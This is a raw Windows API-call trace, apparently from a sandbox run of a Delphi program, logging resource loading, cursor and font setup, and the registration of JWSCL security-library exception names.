[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff11, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff10, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff2f, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0090.166] LoadStringA (in: hInstance=0x2950000, uID=0xff2e, lpBuffer=0x12f010, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0090.166] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0090.166] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0090.167] GetVersion () returned 0x1db10106
[0090.167] GetCurrentProcessId () returned 0xf48
[0090.167] GlobalAddAtomA (lpString="Delphi00000F48") returned 0xc15a
[0090.167] GetCurrentThreadId () returned 0xf4c
[0090.167] GlobalAddAtomA (lpString="ControlOfs0295000000000F4C") returned 0xc153
[0090.167] RegisterClipboardFormatA (lpszFormat="ControlOfs0295000000000F4C") returned 0xc161
[0090.167] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0090.167] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0090.167] GetSystemMetrics (nIndex=19) returned 1
[0090.167] GetSystemMetrics (nIndex=75) returned 1
[0090.167] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a71320, fWinIni=0x0 | out: pvParam=0x2a71320) returned 1
[0090.167] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0090.167] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0090.167] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ff9) returned 0x101db
[0090.167] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0090.167] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0090.168] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0090.168] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffa) returned 0x101dd
[0090.168] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffb) returned 0x101df
[0090.168] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffc) returned 0x101e1
[0090.168] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffd) returned 0x101e3
[0090.168] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7fff) returned 0x101e5
[0090.169] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffe) returned 0x101e7
[0090.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0090.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0090.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0090.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0090.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0090.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0090.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0090.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0090.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0090.169] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0090.169] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0090.169] GetDC (hWnd=0x0) returned 0x2b010799
[0090.169] GetDeviceCaps (hdc=0x2b010799, index=90) returned 96
[0090.169] ReleaseDC (hWnd=0x0, hDC=0x2b010799) returned 1
[0090.169] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0090.170] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x29a9a60, dwData=0x2a7156c) returned 1
[0090.170] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x12f37b, fWinIni=0x0 | out: pvParam=0x12f37b) returned 1
[0090.170] CreateFontIndirectA (lplf=0x12f37b) returned 0xb0a0867
[0090.170] GetObjectA (in: h=0xb0a0867, c=60, pv=0x12f16c | out: pv=0x12f16c) returned 60
[0090.170] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x12f227, fWinIni=0x0 | out: pvParam=0x12f227) returned 1
[0090.170] CreateFontIndirectA (lplf=0x12f303) returned 0xd0a0863
[0090.170] GetObjectA (in: h=0xd0a0863, c=60, pv=0x12f16c | out: pv=0x12f16c) returned 60
[0090.170] CreateFontIndirectA (lplf=0x12f2c7) returned 0xc0a0864
[0090.170] GetObjectA (in: h=0xc0a0864, c=60, pv=0x12f16c | out: pv=0x12f16c) returned 60
[0090.171] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0090.171] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x12f2db, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0090.171] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x12f2db | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0090.171] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x150000
[0090.171] GetKeyboardLayoutList (in: nBuff=64, lpList=0x12f25c | out: lpList=0x12f25c) returned 1
[0090.172] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0090.172] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0090.173] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6ced0000
[0090.173] GetProcAddress (hModule=0x6ced0000, lpProcName="InitializeFlatSB") returned 0x6cf0266f
[0090.173] GetProcAddress (hModule=0x6ced0000, lpProcName="UninitializeFlatSB") returned 0x6cf02542
[0090.173] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollProp") returned 0x6cf01d29
[0090.173] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollProp") returned 0x6cf0238d
[0090.174] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_EnableScrollBar") returned 0x6cf020c9
[0090.174] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_ShowScrollBar") returned 0x6cf01fdb
[0090.174] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollRange") returned 0x6cf01e8d
[0090.174] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollInfo") returned 0x6cf01f0f
[0090.174] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_GetScrollPos") returned 0x6cf01ccd
[0090.174] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollPos") returned 0x6cf0216d
[0090.174] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollInfo") returned 0x6cf022be
[0090.174] GetProcAddress (hModule=0x6ced0000, lpProcName="FlatSB_SetScrollRange") returned 0x6cf021e2
[0090.174] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0090.174] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0090.174] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0090.175] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0090.175] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0090.175] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0090.175] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0090.175] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0090.175] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0090.175] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0090.175] LoadStringA (in: hInstance=0x2950000, uID=0xff59, lpBuffer=0x12efbc, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0090.175] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0090.175] LoadStringA (in: hInstance=0x2950000, uID=0xff5a, lpBuffer=0x12efbc, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0090.175] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0090.175] LoadStringA (in: hInstance=0x2950000, uID=0xff5b, lpBuffer=0x12efbc, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0090.175] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0090.175] LoadStringA (in: hInstance=0x2950000, uID=0xff5c, lpBuffer=0x12efbc, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0090.175] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0090.175] SetErrorMode (uMode=0x8000) returned 0x1
[0090.176] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6ceb0000
[0090.519] SetErrorMode (uMode=0x1) returned 0x8000
[0090.519] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreatePropertyFrame") returned 0x6ceb20ea
[0090.519] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreateFontIndirect") returned 0x6ceb20b7
[0090.519] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleCreatePictureIndirect") returned 0x6ceb20c8
[0090.519] GetProcAddress (hModule=0x6ceb0000, lpProcName="OleLoadPicture") returned 0x6ceb20d9
[0090.519] SysReAllocStringLen (in: pbstr=0x2a3fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2a3fa98*="EJwsclUnsupportedException") returned 1
[0090.519] SysReAllocStringLen (in: pbstr=0x2a3fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2a3fa80*="EJwsclPIDException") returned 1
[0090.519] SysReAllocStringLen (in: pbstr=0x2a3fa68*=0x0, psz="EJwsclJwShellExecuteException", len=0x1d | out: pbstr=0x2a3fa68*="EJwsclJwShellExecuteException") returned 1
[0090.519] SysReAllocStringLen (in: pbstr=0x2a3fa50*=0x0, psz="EJwsclShellExecuteException", len=0x1b | out: pbstr=0x2a3fa50*="EJwsclShellExecuteException") returned 1
[0090.519] SysReAllocStringLen (in: pbstr=0x2a3fa38*=0x0, psz="EJwsclElevationException", len=0x18 | out: pbstr=0x2a3fa38*="EJwsclElevationException") returned 1
[0090.519] SysReAllocStringLen (in: pbstr=0x2a3fa20*=0x0, psz="EJwsclAbortException", len=0x14 | out: pbstr=0x2a3fa20*="EJwsclAbortException") returned 1
[0090.519] SysReAllocStringLen (in: pbstr=0x2a3fa08*=0x0, psz="EJwsclSuRunErrorException", len=0x19 | out: pbstr=0x2a3fa08*="EJwsclSuRunErrorException") returned 1
[0090.519] SysReAllocStringLen (in: pbstr=0x2a3f9f0*=0x0, psz="EJwsclElevateProcessException", len=0x1d | out: pbstr=0x2a3f9f0*="EJwsclElevateProcessException") returned 1
[0090.519] SysReAllocStringLen (in: pbstr=0x2a3f9d8*=0x0, psz="EJwsclCertApiException", len=0x16 | out: pbstr=0x2a3f9d8*="EJwsclCertApiException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f9c0*=0x0, psz="EJwsclVistaFeaturesDisabled", len=0x1b | out: pbstr=0x2a3f9c0*="EJwsclVistaFeaturesDisabled") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f9a8*=0x0, psz="EJwsclInvalidStartupInfo", len=0x18 | out: pbstr=0x2a3f9a8*="EJwsclInvalidStartupInfo") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f990*=0x0, psz="EJwsclFirewallNoExceptionsException", len=0x23 | out: pbstr=0x2a3f990*="EJwsclFirewallNoExceptionsException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f978*=0x0, psz="EJwsclFirewallInactiveException", len=0x1f | out: pbstr=0x2a3f978*="EJwsclFirewallInactiveException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f960*=0x0, psz="EJwsclFirewallDelRuleException", len=0x1e | out: pbstr=0x2a3f960*="EJwsclFirewallDelRuleException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f948*=0x0, psz="EJwsclAddUdpPortToFirewallException", len=0x23 | out: pbstr=0x2a3f948*="EJwsclAddUdpPortToFirewallException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f930*=0x0, psz="EJwsclAddTcpPortToFirewallException", len=0x23 | out: pbstr=0x2a3f930*="EJwsclAddTcpPortToFirewallException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f918*=0x0, psz="EJwsclFirewallAddRuleException", len=0x1e | out: pbstr=0x2a3f918*="EJwsclFirewallAddRuleException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f900*=0x0, psz="EJwsclSetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a3f900*="EJwsclSetRemoteAdminAdressException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f8e8*=0x0, psz="EJwsclGetRemoteAdminAdressException", len=0x23 | out: pbstr=0x2a3f8e8*="EJwsclGetRemoteAdminAdressException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f8d0*=0x0, psz="EJwsclSetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a3f8d0*="EJwsclSetRemoteAdminAllowedException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f8b8*=0x0, psz="EJwsclGetRemoteAdminAllowedException", len=0x24 | out: pbstr=0x2a3f8b8*="EJwsclGetRemoteAdminAllowedException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f8a0*=0x0, psz="EJwsclSetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a3f8a0*="EJwsclSetIncomingPingAllowedException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f888*=0x0, psz="EJwsclGetIncomingPingAllowedException", len=0x25 | out: pbstr=0x2a3f888*="EJwsclGetIncomingPingAllowedException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f870*=0x0, psz="EJwsclSetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a3f870*="EJwsclSetFWExceptionsAllowedException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f858*=0x0, psz="EJwsclGetFWExceptionsAllowedException", len=0x25 | out: pbstr=0x2a3f858*="EJwsclGetFWExceptionsAllowedException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f840*=0x0, psz="EJwsclGetFWStateException", len=0x19 | out: pbstr=0x2a3f840*="EJwsclGetFWStateException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f828*=0x0, psz="EJwsclSetFWStateException", len=0x19 | out: pbstr=0x2a3f828*="EJwsclSetFWStateException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f810*=0x0, psz="EJwsclFirewallProfileInitException", len=0x22 | out: pbstr=0x2a3f810*="EJwsclFirewallProfileInitException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f7f8*=0x0, psz="EJwsclFirewallInitException", len=0x1b | out: pbstr=0x2a3f7f8*="EJwsclFirewallInitException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f7e0*=0x0, psz="EJwsclGenericFirewallException", len=0x1e | out: pbstr=0x2a3f7e0*="EJwsclGenericFirewallException") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f7c8*=0x0, psz="EJwsclEnumerateProcessFailed", len=0x1c | out: pbstr=0x2a3f7c8*="EJwsclEnumerateProcessFailed") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f7b0*=0x0, psz="EJwsclInvalidRegistryPath", len=0x19 | out: pbstr=0x2a3f7b0*="EJwsclInvalidRegistryPath") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f798*=0x0, psz="EJwsclEndOfStream", len=0x11 | out: pbstr=0x2a3f798*="EJwsclEndOfStream") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f780*=0x0, psz="EJwsclClassTypeMismatch", len=0x17 | out: pbstr=0x2a3f780*="EJwsclClassTypeMismatch") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f768*=0x0, psz="EJwsclInvalidHandle", len=0x13 | out: pbstr=0x2a3f768*="EJwsclInvalidHandle") returned 1
[0090.520] SysReAllocStringLen (in: pbstr=0x2a3f750*=0x0, psz="EJwsclInvalidIndex", len=0x12 | out: pbstr=0x2a3f750*="EJwsclInvalidIndex") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f738*=0x0, psz="EJwsclInvalidSession", len=0x14 | out: pbstr=0x2a3f738*="EJwsclInvalidSession") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f720*=0x0, psz="EJwsclMissingEvent", len=0x12 | out: pbstr=0x2a3f720*="EJwsclMissingEvent") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f708*=0x0, psz="EJwsclInvalidPointerType", len=0x18 | out: pbstr=0x2a3f708*="EJwsclInvalidPointerType") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f6f0*=0x0, psz="EJwsclCreateProcessFailed", len=0x19 | out: pbstr=0x2a3f6f0*="EJwsclCreateProcessFailed") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f6d8*=0x0, psz="EJwsclNilPointer", len=0x10 | out: pbstr=0x2a3f6d8*="EJwsclNilPointer") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f6c0*=0x0, psz="EJwsclUnimplemented", len=0x13 | out: pbstr=0x2a3f6c0*="EJwsclUnimplemented") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f6a8*=0x0, psz="EJwsclInitWellKnownException", len=0x1c | out: pbstr=0x2a3f6a8*="EJwsclInitWellKnownException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f690*=0x0, psz="EJwsclKeyApiException", len=0x15 | out: pbstr=0x2a3f690*="EJwsclKeyApiException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f678*=0x0, psz="EJwsclKeyException", len=0x12 | out: pbstr=0x2a3f678*="EJwsclKeyException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f660*=0x0, psz="EJwsclHashApiException", len=0x16 | out: pbstr=0x2a3f660*="EJwsclHashApiException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f648*=0x0, psz="EJwsclHashException", len=0x13 | out: pbstr=0x2a3f648*="EJwsclHashException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f630*=0x0, psz="EJwsclCSPApiException", len=0x15 | out: pbstr=0x2a3f630*="EJwsclCSPApiException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f618*=0x0, psz="EJwsclCSPException", len=0x12 | out: pbstr=0x2a3f618*="EJwsclCSPException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f600*=0x0, psz="EJwsclTerminalSessionException", len=0x1e | out: pbstr=0x2a3f600*="EJwsclTerminalSessionException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f5e8*=0x0, psz="EJwsclTerminalServiceNecessary", len=0x1e | out: pbstr=0x2a3f5e8*="EJwsclTerminalServiceNecessary") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f5d0*=0x0, psz="EJwsclTerminalServiceException", len=0x1e | out: pbstr=0x2a3f5d0*="EJwsclTerminalServiceException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f5b8*=0x0, psz="EJwsclTerminalServerConnectException", len=0x24 | out: pbstr=0x2a3f5b8*="EJwsclTerminalServerConnectException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f5a0*=0x0, psz="EJwsclTerminalServerException", len=0x1d | out: pbstr=0x2a3f5a0*="EJwsclTerminalServerException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f588*=0x0, psz="EJwsclCryptUnsupportedException", len=0x1f | out: pbstr=0x2a3f588*="EJwsclCryptUnsupportedException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f570*=0x0, psz="EJwsclCryptApiException", len=0x17 | out: pbstr=0x2a3f570*="EJwsclCryptApiException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f558*=0x0, psz="EJwsclCryptException", len=0x14 | out: pbstr=0x2a3f558*="EJwsclCryptException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f540*=0x0, psz="EJwsclOSError", len=0xd | out: pbstr=0x2a3f540*="EJwsclOSError") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f528*=0x0, psz="EJwsclResourceInitFailed", len=0x18 | out: pbstr=0x2a3f528*="EJwsclResourceInitFailed") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f510*=0x0, psz="EJwsclResourceUnequalCount", len=0x1a | out: pbstr=0x2a3f510*="EJwsclResourceUnequalCount") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f4f8*=0x0, psz="EJwsclResourceNotFound", len=0x16 | out: pbstr=0x2a3f4f8*="EJwsclResourceNotFound") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f4e0*=0x0, psz="EJwsclResourceException", len=0x17 | out: pbstr=0x2a3f4e0*="EJwsclResourceException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f4c8*=0x0, psz="EJwsclFailedAddACE", len=0x12 | out: pbstr=0x2a3f4c8*="EJwsclFailedAddACE") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f4b0*=0x0, psz="EJwsclUnsupportedACE", len=0x14 | out: pbstr=0x2a3f4b0*="EJwsclUnsupportedACE") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f498*=0x0, psz="EJwsclOpenWindowStationException", len=0x20 | out: pbstr=0x2a3f498*="EJwsclOpenWindowStationException") returned 1
[0090.521] SysReAllocStringLen (in: pbstr=0x2a3f480*=0x0, psz="EJwsclWindowStationException", len=0x1c | out: pbstr=0x2a3f480*="EJwsclWindowStationException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f468*=0x0, psz="EJwsclCloseDesktopException", len=0x1b | out: pbstr=0x2a3f468*="EJwsclCloseDesktopException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f450*=0x0, psz="EJwsclCreateDesktopException", len=0x1c | out: pbstr=0x2a3f450*="EJwsclCreateDesktopException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f438*=0x0, psz="EJwsclOpenDesktopException", len=0x1a | out: pbstr=0x2a3f438*="EJwsclOpenDesktopException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f420*=0x0, psz="EJwsclDesktopException", len=0x16 | out: pbstr=0x2a3f420*="EJwsclDesktopException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f408*=0x0, psz="EJwsclSACLAccessDenied", len=0x16 | out: pbstr=0x2a3f408*="EJwsclSACLAccessDenied") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f3f0*=0x0, psz="EJwsclAccessDenied", len=0x12 | out: pbstr=0x2a3f3f0*="EJwsclAccessDenied") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f3d8*=0x0, psz="EJwsclLSAException", len=0x12 | out: pbstr=0x2a3f3d8*="EJwsclLSAException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f3c0*=0x0, psz="ESetOwnerException", len=0x12 | out: pbstr=0x2a3f3c0*="ESetOwnerException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f3a8*=0x0, psz="ESetSecurityException", len=0x15 | out: pbstr=0x2a3f3a8*="ESetSecurityException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f390*=0x0, psz="EJwsclInvalidParentDescriptor", len=0x1d | out: pbstr=0x2a3f390*="EJwsclInvalidParentDescriptor") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f378*=0x0, psz="EJwsclInvalidKeyPath", len=0x14 | out: pbstr=0x2a3f378*="EJwsclInvalidKeyPath") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f360*=0x0, psz="EJwsclInvalidGenericAccessMask", len=0x1e | out: pbstr=0x2a3f360*="EJwsclInvalidGenericAccessMask") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f348*=0x0, psz="EJwsclAdaptSecurityInfoException", len=0x20 | out: pbstr=0x2a3f348*="EJwsclAdaptSecurityInfoException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f330*=0x0, psz="EJwsclThreadException", len=0x15 | out: pbstr=0x2a3f330*="EJwsclThreadException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f318*=0x0, psz="EJwsclInvalidObjectException", len=0x1c | out: pbstr=0x2a3f318*="EJwsclInvalidObjectException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f300*=0x0, psz="EJwsclSecurityObjectException", len=0x1d | out: pbstr=0x2a3f300*="EJwsclSecurityObjectException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f2e8*=0x0, psz="EJwsclHashMismatch", len=0x12 | out: pbstr=0x2a3f2e8*="EJwsclHashMismatch") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f2d0*=0x0, psz="EJwsclStreamHashException", len=0x19 | out: pbstr=0x2a3f2d0*="EJwsclStreamHashException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f2b8*=0x0, psz="EJwsclStreamInvalidMagicException", len=0x21 | out: pbstr=0x2a3f2b8*="EJwsclStreamInvalidMagicException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f2a0*=0x0, psz="EJwsclStreamSizeException", len=0x19 | out: pbstr=0x2a3f2a0*="EJwsclStreamSizeException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f288*=0x0, psz="EJwsclStreamException", len=0x15 | out: pbstr=0x2a3f288*="EJwsclStreamException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f270*=0x0, psz="EJwsclNoSuchLogonSession", len=0x18 | out: pbstr=0x2a3f270*="EJwsclNoSuchLogonSession") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f258*=0x0, psz="EJwsclInvalidFlagsException", len=0x1b | out: pbstr=0x2a3f258*="EJwsclInvalidFlagsException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f240*=0x0, psz="EJwsclProcessNotFound", len=0x15 | out: pbstr=0x2a3f240*="EJwsclProcessNotFound") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f228*=0x0, psz="EJwsclInvalidParameterException", len=0x1f | out: pbstr=0x2a3f228*="EJwsclInvalidParameterException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f210*=0x0, psz="EJwsclInvalidPathException", len=0x1a | out: pbstr=0x2a3f210*="EJwsclInvalidPathException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f1f8*=0x0, psz="EJwsclInvalidSecurityDescriptor", len=0x1f | out: pbstr=0x2a3f1f8*="EJwsclInvalidSecurityDescriptor") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f1e0*=0x0, psz="EJwsclInvalidRevision", len=0x15 | out: pbstr=0x2a3f1e0*="EJwsclInvalidRevision") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f1c8*=0x0, psz="EJwsclInvalidAceMismatch", len=0x18 | out: pbstr=0x2a3f1c8*="EJwsclInvalidAceMismatch") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f1b0*=0x0, psz="EJwsclRevisionMismatchException", len=0x1f | out: pbstr=0x2a3f1b0*="EJwsclRevisionMismatchException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f198*=0x0, psz="EJwsclInvalidACEException", len=0x19 | out: pbstr=0x2a3f198*="EJwsclInvalidACEException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f180*=0x0, psz="EJwsclReadOnlyPropertyException", len=0x1f | out: pbstr=0x2a3f180*="EJwsclReadOnlyPropertyException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f168*=0x0, psz="EJwsclDuplicateListEntryException", len=0x21 | out: pbstr=0x2a3f168*="EJwsclDuplicateListEntryException") returned 1
[0090.522] SysReAllocStringLen (in: pbstr=0x2a3f150*=0x0, psz="EJwsclIndexOutOfBoundsException", len=0x1f | out: pbstr=0x2a3f150*="EJwsclIndexOutOfBoundsException") returned 1
